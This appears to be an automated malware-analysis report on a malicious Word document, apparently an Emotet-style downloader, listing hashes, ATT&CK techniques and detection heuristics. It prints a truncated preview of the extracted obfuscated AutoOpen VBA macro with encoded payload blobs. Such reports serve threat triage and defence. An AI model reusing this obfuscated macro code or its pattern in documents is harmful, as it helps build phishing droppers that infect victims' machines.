Office (OLE) malware analysis — malicious · d6b3e2bceb12ecbc

MALICIOUS

Office (OLE)

226.0 KB Created: 2018-03-29 21:05:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 0cacc2309786dc78ac0b8a3333193bab SHA-1: 92b33cbb4e9a7669272f4491da882828bd40a938 SHA-256: d6b3e2bceb12ecbcc7d10dffa6cb6b943ad578afec4beeb47b7603e98fd1bb6b

224 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

The file is a malicious Office document containing a VBA macro. The macro is triggered by the AutoOpen function and uses CreateObject to likely download and execute a second-stage payload, as indicated by the ClamAV detection 'Doc.Malware.Emodldr-10025032-0'. The presence of a VBA macro and the AutoOpen execution marker strongly suggest a spearphishing attachment delivery vector.

Heuristics 8

ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	35674 bytes
SHA-256: `406c7a5f1f5da64131571b2d1cdb9326b288975b6d9920f71a3a1059b50e37bd`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 23 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "cdlvpCN" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "aRDNTsEBcf" Function ZvWbXfDrHJcr() On Error Resume Next CafHrd = 63031 / Round(MLWUI) + aAlwGi - CStr(99927) * KBPSbJ * AwhPC * iUHcNf * bknwR IVlsJb = IPirYB PViuJWLT = zCIGn("uj1EAGIANgBiAGEAZgBhAGIAOABmADkANwAyAGIAOQAwADYANwA2AGIANwAzADEANAA5ADIAYQA5ADcAMAA3AGEAYgBlADcANABkAD%Pj2z", 5, 98) wLOoE = 10761 / Round(sjdTsz) + RZORBA - CStr(2232) * OEYoYj * pQEMH * PVwtL * PpIYQb qpPZXA = BwKPQ AqZpzW = 513 / Round(cfbYi) + siYaO - CStr(54595) * FtUFXK * pdJjaU * Gqhiw * DGMFW MCYnvJ = kvzFk suhjmtRjEUd = zCIGn("UwGEAYwA0AGEAMQA0ADgAZgBhADcAMABiADMAZAA3AGQANQBhAGYANwAwADAAYQA0AGQANQA5ADI@Att", 3, 74) LKZzWr = 97127 / Round(Amrrs) + VowjO - CStr(65786) * wmQpOa * kVIlw * nvdHq * YNLPh DtfvwQ = ChNYJJ rtRoE = 39691 / Round(DBZzW) + hlOUuZ - CStr(1806) * CFNDt * RoiBS * RZCSq * lSHwlD wLXnpD = jspoDk jCjzlnjYEM = zCIGn("z0aEANwAxADAAMQAxADUAOAAzADYAMwAxADEAOQBhADgAYQA4ADQAZQAyAGUAMQBkADAAMwBmAGIAMwBiADAAMAAzADYAOAA0AGEAOQA0ADAAZAA4ADMAMABjAGQAMABlADYAYQA4AGEAMQAwPRQ", 4, 142) JBPTY = 62765 / Round(dIiwi) + nhIDT - CStr(18450) * zwuAs * lhYkOO * ZbRsi * WZSDo LsuBjl = uMNKG PRkzvw = 14305 / Round(WnfMjc) + JXJTW - CStr(16102) * EuvGko * fpwwPT * QGwXzw * muCzus PNwppQ = pEpLS bIhqiwDrLBA = zCIGn("azZPzcMBmADEAYwA1AGYAYQAyADMAMwBhADAAMQA2ADAANwAxADIAYwBhADIAZQA4ADMAZQBkADEAMwAyADkANQBhADQAZgBiADkANQAwAGQAYQA2ADMAN@Y", 8, 111) qwiPQ = 17470 / Round(tRLvY) + GRAsG - CStr(80590) * lPczGZ * jaBJL * lBoLmi * nCwCCQ JvpLiW = cbWlI SmqVjl = 31522 / Round(uQRWj) + vVmCJ - CStr(48872) * msZHm * iuXtaW * zJVKw * KXqwNo SkCDzZ = DjuQO QcPuWjfwHUE = zCIGn("jqjclAGYAYgAyAGIANgA3ADYAMgAyADIANwBkAGEAYQA3ADIAZABhAGYAZABjAGYANwA5AGIANwA3ADEAZAA2APFaR", 6, 81) JldXXq = 99252 / Round(KlAbE) + OAwtL - CStr(37087) * JurUw * WLTPE * BiYtTb * oKHwC tDlDkB = uoArl TjvLmp = 23374 / Round(dhlUfm) + FctTA - CStr(13193) * ISBzn * vSNzzM * MOMCBo * fQsViV GpKwuf = adKoC QoARXKWUQz = zCIGn("REtAMwBiADEANQA5ADYANwA4AGEAYQBkAGYAOQA1ADUAYwAyAGEAYQA2ADQAMQA3ADgAMgBmAGQAMwAzADEAOQA4ADYAMQBmADMAZAGwzz", 4, 99) fKUnX = 36280 / Round(ArPrR) + Ynsaf - CStr(29787) * LodCw * hbmlB * zaCUw * zPLlP ThiGM = DfZlDr EVdBO = 85753 / Round(DYrUUz) + OhtqL - CStr(93438) * dTHPlU * IhWPT * sDCbEk * TbSAoY aYVVT = KaCWl HbwJu = zCIGn("Ii5ADAANwA.jS", 4, 7) YtuqUF = 1915 / Round(hKfRl) + IaCAGb - CStr(26193) * ZkMAv * TRBfqc * vYkzv * CjPsDk NkYBQK = UTKiU DzhpYk = 2166 / Round(AJKJpR) + kadSjv - CStr(92992) * ffGPt * ajRtBH * nOjhS * JblmiU bwvldD = rBKSV LKEfNMkupT = zCIGn("tPbwwBmAGIANgAyADQAZQA3ADQAZABhADUAZgAxADcAOQAyAGIANQA3AGYANABiAGMAZQAwAGEANwA2ADIAZAAzAGUAr5", 5, 87) sadsQ = 75997 / Round(bwLuk) + Lmfus - CStr(45326) * zSbkfP * AbmDRM * rjwtW * KRimAB sTLGR = aIazsM QSJMBo = 62049 / Round(lZqEw) + iYwzUV - CStr(47215) * qHRrJX * DluuGJ * BvjMD * zEjBp XvdUh = KicCv jznLINwMc = zCIGn("nLiREIAQgBSAGcARwBJADYAdABMAFIAVQBPAG8AcABKAGcAPQA9AHwAMAA1AGMAOQAzADYAOAAzADgAYwBhADMAZQA1ADQAYQBiADcAZAA5ADYA3t2", 5, 107) iJTho = 92589 / Round(qSKXC) + HRMil - CStr(51165) * CkzBa * Mtvbq * AXiusR * kswHM aCZkw = rbjGu GbovzN = 86980 / Round(bGmvSq) + lKOWNl - CStr(3800) * EUGzYw * dObkdv * NDDdKh * JLfas XPOYI = rjbtO tNphNwD = zCIGn("Zlzz8AwADUAYQAxADYAOQBkAGUAYQA0ADYAYwAwADQAYQA3ADEAMAAyADcAZQA0AGUAMgA3AGUAYQAzADcAZgA1ADQANgAzADcAYQA0AGIANQBhAGYAMgAwADcAMzaa", 6, 119) fldXU = 64239 / Round(jozLT) + bUhuIa - CStr(48406) * jSNzDc * ENmKp * iwZmr * NMaaEv hjKoSS = ovSPXQ bFmAK = 58835 / Round(sSDXBw) + EuYja - CStr(7098) * YvoJXP * lKFql * wzjBzT * KYFFDQ sASALf = DKzrm RHEutYb = zCIGn("3NNLOQAZAAyADcANABjAGQAOABhADAAYgA3ADkAZQBiAGEANAA5ADIAYwBmADUANAA4ADcAZgAxADAANwAzADgAOAA1AGMAYwA3ADUANwA3ADUANABlAGEAYQAwADAAMQA0ADkANQAyADQAMAAyp%", 6, 142) mHHzh = 30980 / Round(DENXk) + OmApj - CStr(10552) * VNksF * FNvpjJ * ECCQI * nuqnm QEQbCV ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.